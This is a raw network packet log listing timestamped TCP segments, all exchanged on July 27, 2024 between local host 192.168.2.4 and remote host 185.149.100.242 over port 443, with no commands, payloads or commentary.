Jul 27, 2024 08:54:13.290358067 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290369034 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290426016 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290455103 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290481091 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290484905 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290508986 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290528059 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290585041 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290604115 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290633917 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290637970 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290658951 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290673018 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290735006 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290759087 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290785074 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290790081 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290813923 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290826082 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290884972 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290910959 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290941954 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290946007 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.290961981 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.290981054 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291038990 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291059971 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291095972 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291100025 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291124105 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291141987 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291169882 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291193962 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291223049 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291227102 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291251898 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291265011 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291306973 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291328907 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291358948 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291363001 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291392088 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291408062 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291445971 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291465044 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291496038 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291501045 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291526079 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291538000 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291575909 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291594982 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291620970 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291625023 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291651964 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291666031 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291711092 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291739941 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291769028 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291773081 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291800976 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291809082 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291850090 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291870117 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291901112 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291904926 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.291930914 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291939974 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.291985035 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292004108 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292032957 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.292037010 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292063951 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.292074919 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.292119980 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292140961 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292175055 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.292179108 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292206049 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.292215109 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.292231083 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292259932 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292290926 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.292296886 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.292315960 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.292332888 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.296816111 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.304501057 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.304533958 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.304594994 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.304604053 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.304630995 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.304649115 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.312434912 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.312514067 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.312521935 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.312551975 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.312582016 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.312592030 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.312855005 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.312901974 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.312928915 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.312935114 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.312954903 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.312973976 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.313132048 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.313177109 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.313200951 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.313205957 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.313235044 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.313242912 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.339397907 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.339453936 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.339512110 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.339529991 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.339564085 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.339581013 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.349684954 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.349718094 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.349807978 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.349822044 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.349894047 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.355251074 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.355309963 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.355340958 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.355350971 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.355382919 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.355397940 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.358705997 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.358756065 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.358791113 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.358800888 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.358829021 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.358850002 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.395989895 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.396048069 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.396100044 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.396111965 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.396140099 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.396153927 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407205105 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407263994 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407294035 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407303095 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407336950 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407356024 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407557011 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407608986 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407634020 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407638073 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407666922 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407685995 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407841921 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407885075 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407908916 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407912970 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.407939911 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.407958031 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.430187941 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.430248976 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.430286884 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.430327892 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.430360079 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.430382013 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.440728903 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.440794945 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.440928936 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.440928936 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.440947056 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.441235065 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.445635080 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.445707083 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.445741892 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.445750952 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.445780993 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.445796013 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.448972940 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.449026108 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.449064016 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.449069977 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.449099064 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.449122906 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.487910986 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.487977982 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.488002062 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.488010883 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.488049030 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.488065958 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498106956 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498162031 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498189926 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498198032 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498229980 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498254061 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498462915 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498512983 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498537064 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498541117 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498570919 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498584986 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498730898 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498778105 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498806000 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498810053 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.498841047 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.498852968 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.509270906 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.521194935 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.521261930 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.521290064 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.521296978 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.521326065 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.521338940 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.531331062 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.531379938 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.531428099 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.531436920 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.531469107 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.531486988 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.536418915 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.536478996 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.536498070 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.536534071 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.536570072 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.536638975 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.540124893 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.540169001 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.540214062 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.540219069 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.540247917 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.540265083 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.579189062 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.579260111 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.579277039 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.579282999 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.579327106 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.590394974 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.590447903 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.590477943 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.590481997 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.590503931 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.590523005 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.590727091 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.590769053 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.590790987 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.590795040 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.590816975 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.590823889 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.590984106 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.591028929 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.591051102 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.591054916 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.591080904 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.591094017 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.592050076 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.611655951 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.611716032 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.611726999 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.611742973 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.611773014 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.611789942 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.621330976 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.622252941 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.622344017 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.622368097 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.622373104 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.622410059 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.622422934 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.625277042 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.627434015 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.627500057 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.627515078 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.627527952 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.627559900 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.627573013 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.629618883 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.631052017 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.631105900 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.631124020 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.631129026 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.631154060 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.631171942 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.632363081 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.669598103 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.669653893 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.669660091 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.669682026 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.669709921 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.669723034 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.681211948 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681257963 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681273937 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.681278944 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681313038 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.681540012 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681588888 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681603909 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.681610107 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681634903 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.681648016 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.681804895 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681859970 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681874037 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.681885958 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.681905031 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.681920052 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.702503920 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.702544928 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.702579021 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.702589035 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.702615023 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.702635050 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.713378906 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.713443995 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.713460922 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.713471889 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.713504076 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.713519096 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.718933105 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.719001055 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.719013929 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.719023943 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.719054937 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.719067097 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.721936941 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.721987963 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.722003937 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.722011089 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.722042084 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.722053051 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:13.761622906 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.761694908 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:13.761718035 CEST	50695	443	192.168.2.4	185.149.100.242
